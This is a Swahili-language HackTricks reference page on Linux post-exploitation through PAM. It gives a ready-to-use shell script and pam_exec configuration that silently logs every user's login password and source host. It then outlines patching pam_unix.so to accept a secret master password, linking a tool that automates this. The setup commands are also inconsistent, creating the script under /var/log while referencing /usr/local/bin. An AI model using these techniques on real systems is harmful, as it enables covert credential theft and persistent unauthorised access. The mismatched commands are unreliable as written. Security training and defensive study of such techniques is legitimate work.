HackTricksLinux Post-Exploitation
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Sniffing Logon Passwords with PAM
Tuwekeze moduli ya PAM ili kurekodi kila nenosiri ambalo mtumiaji anatumia kuingia. Ikiwa hujui ni nini PAM angalia:
{{#ref}} pam-pluggable-authentication-modules.md {{#endref}}
Kwa maelezo zaidi angalia post ya asili. Hii ni muhtasari tu:
Muhtasari wa Mbinu: Moduli za Uthibitishaji Zinazoweza Kuunganishwa (PAM) zinatoa kubadilika katika usimamizi wa uthibitishaji kwenye mifumo ya Unix. Zinaweza kuongeza usalama kwa kubadilisha michakato ya kuingia lakini pia zinaweza kuleta hatari ikiwa zitakosewa. Muhtasari huu unaelezea mbinu ya kukamata taarifa za kuingia kwa kutumia PAM, pamoja na mikakati ya kupunguza hatari.
Kukamata Taarifa:
- Skripti ya bash inayoitwa
toomanysecrets.shimeandaliwa ili kurekodi majaribio ya kuingia, ikikamata tarehe, jina la mtumiaji ($PAM_USER), nenosiri (kupitia stdin), na IP ya mwenyeji wa mbali ($PAM_RHOST) kwenye/var/log/toomanysecrets.log. - Skripti hiyo imefanywa kuwa executable na kuunganishwa kwenye usanidi wa PAM (
common-auth) kwa kutumia moduli yapam_exec.soyenye chaguzi za kufanya kazi kimya na kufichua tokeni ya uthibitishaji kwa skripti. - Njia hii inaonyesha jinsi mwenyeji wa Linux aliyeathirika anavyoweza kutumika kukamata taarifa kwa siri.
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
sudo nano /etc/pam.d/common-auth
# Add: auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh
sudo chmod 700 /usr/local/bin/toomanysecrets.sh
Backdooring PAM
Kwa maelezo zaidi angalia post ya asili. Hii ni muhtasari tu:
Moduli ya Uthibitishaji inayoweza Kuunganishwa (PAM) ni mfumo unaotumika chini ya Linux kwa uthibitishaji wa mtumiaji. Inafanya kazi kwa dhana tatu kuu: jina la mtumiaji, nenosiri, na huduma. Faili za usanidi kwa kila huduma ziko katika saraka ya /etc/pam.d/, ambapo maktaba za pamoja hushughulikia uthibitishaji.
Lengo: Badilisha PAM ili kuruhusu uthibitishaji kwa nenosiri maalum, kupita nenosiri halisi la mtumiaji. Hii inazingatia hasa maktaba ya pamoja pam_unix.so inayotumiwa na faili ya common-auth, ambayo inajumuishwa na huduma karibu zote kwa ajili ya uthibitishaji wa nenosiri.
Hatua za Kubadilisha pam_unix.so:
- Pata Mwelekeo wa Uthibitishaji katika faili ya
common-auth:
- Mstari unaohusika na kuangalia nenosiri la mtumiaji unaita
pam_unix.so.
- Badilisha Msimbo wa Chanzo:
- Ongeza taarifa ya masharti katika faili ya chanzo
pam_unix_auth.cinayoruhusu ufikiaji ikiwa nenosiri lililotolewa linatumika, vinginevyo, inaendelea na mchakato wa kawaida wa uthibitishaji.
- Recompile na Badilisha maktaba iliyobadilishwa
pam_unix.sokatika saraka inayofaa. - Kujaribu:
- Ufikiaji unaruhusiwa katika huduma mbalimbali (kuingia, ssh, sudo, su, screensaver) kwa nenosiri lililotolewa, wakati michakato ya kawaida ya uthibitishaji inabaki bila kuathiriwa.
note
Unaweza kujiandaa mchakato huu kwa https://github.com/zephrax/linux-pam-backdoor
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.